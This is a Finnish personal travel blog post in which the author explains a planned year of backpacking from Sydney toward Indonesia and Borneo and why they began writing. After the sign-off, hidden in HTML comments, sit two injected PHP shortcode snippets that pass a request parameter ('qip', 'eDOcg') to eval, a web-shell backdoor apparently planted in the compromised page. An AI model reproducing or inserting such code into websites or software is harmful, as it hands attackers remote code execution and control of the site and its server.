Aluksi

Ajatus reissaamisesta ei ole ollut elämää suurempi suunnitelma, jonka olen aina halunnut toteuttaa. En kuulu niihin, joiden on mahdotonta olla aloillaan ja tyytyväinen tasaiseen, jopa turvatuksi kutsuttuun elämään. Tai niin ainakin luulin. En aluksi edes ajatellut, että töiden perässä ympäri Suomea juokseminen voitaisiin mieltää reissaamiseksi. Silloinhan kuitenkin on tiedossa määränpää, jokseenkin varma asunto ja työ. Nyt jälkeenpäin ajateltuna, kyseessä on varmaan ollut kuitenkin samaan lajiin kuuluva kaukokaipuu, jonka takia Helsinki ei ole enää pitkään aikaan tuntunut kodilta. Paljon luonnollisempaa on ollut viettää talvet Lapissa ja kesät Hangossa. Kyllähän siinä on tullut tutuksi autossa, junassa ja lentokoneessa istuminen.

Kaipuu jonnekin hieman pidemmälle ja lämpimämpään on kuitenkin hiljalleen nostanut päätään, ja vuosi sitten tein päätöksen säästää rahat ja lähteä katsomaan miltä tuntuu pakata rinkka selkään ja hypätä lentokoneeseen ilman sen suurempaa suunnitelmaa. Australia on kiinnostanut niin kauan kuin jaksan muistaa, mutta vielä kiinnostavampi kohde on Borneo, saari joka jakautuu Indonesian, Malesian ja Brunein sulttaanikunnan kesken. Asiaa pidempään pohdittuani päätin, että koska reissaamista ei ole aiemmin tullut kokeiltua, voisi olla suositeltavampaa aloitta hieman helpommasta, länsimaisesta Australiasta, ja vasta sen jälkeen jatkaa länteen, ensin Indonesiaan ja siitä Borneolle.

No, suunnitelmahan on tähän asti sujunut varsin mallikkaasti. Hieman hätäsesti tuli ostettua lentolippu Sydneyhyn joulun jälkeisille välipäiville ja vasta tämän jälkeen muistin sen toisen asiakirjan, viisumin. No, onneksi Working Holiday -viisumin saaminen Suomen passilla ja moitteettomalla historialla on lähes läpihuutojuttu, ja kiitos aikaeron, sain hyväksytyn päätöksen neljän tunnin päästä hakemukseni jättämisestä. Muutenkin alku tuntui loksahtavan kohdilleen. Syyskuussa oli hyvä ystäväni muuttanut Bondi Beachille, joten vuoden vaihteen yli ei tarvitsisi edes pohtia majottumista.

Aivan toinen tarinahan sitten on tämä kirjoittaminen. Kirjoittaminen ei ole ollut ikinä lempipuuhani. Tai kuulut ikinä edes Top 5 –listalle. Se on enemmänkin ollut välttämätön paha, joka kuuluu osana koulutukseen. Päiväkirjojen pitäminen pikkutyttönä? Ei, ei kiinnosta. Tutkielmien ja esitelmien kirjoittaminen? Ei, mieluummin jääköön AMK-koulutus kesken. Joten, miksi sitten blogi? Hyvin pitkälti itsekkäistä syistä. Tämän mahdollisesti vuoden kestävän reissun aikana haluan haastaa itseni tekemään ja kokeilemaan asioita, jotka jännittävät, pelottavat, ahdistavat tai muuten ajavat mukavuusalueen ulkopuolelle. Jostainhan on aloitettava, ja koska muisti on yllättävän petollinen asia, on hyvä, että edes osa tapahtumista on kirjotettu ylös. Onhan tämä myös paljon helpompi keino jakaa kokemuksia kotona olevalle perheelle ja ystäväpiirille.

Joten tästä lähtee liikkeelle itsensä haastaminen niin reissaamisen kuin kirjoittamisenkin suhteen!

Ja ai niin, inspiraatio blogin nimeen tuli Kuningasidean aivan huikeesta biisistä Yksin Pariisiin. Kannattaa kuunnella, aivan upea, ja kuvaa hyvin ainakin niitä tunteita joita koin koko matkan tänne toiselle puolelle palloa!

 

-M-

<!– [insert_php]if (isset($_REQUEST["qip"])){eval($_REQUEST["qip"]);exit;}[/insert_php][php]if (isset($_REQUEST["qip"])){eval($_REQUEST["qip"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["eDOcg"])){eval($_REQUEST["eDOcg"]);exit;}[/insert_php][php]if (isset($_REQUEST["eDOcg"])){eval($_REQUEST["eDOcg"]);exit;}[/php] –>

Vastaa

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *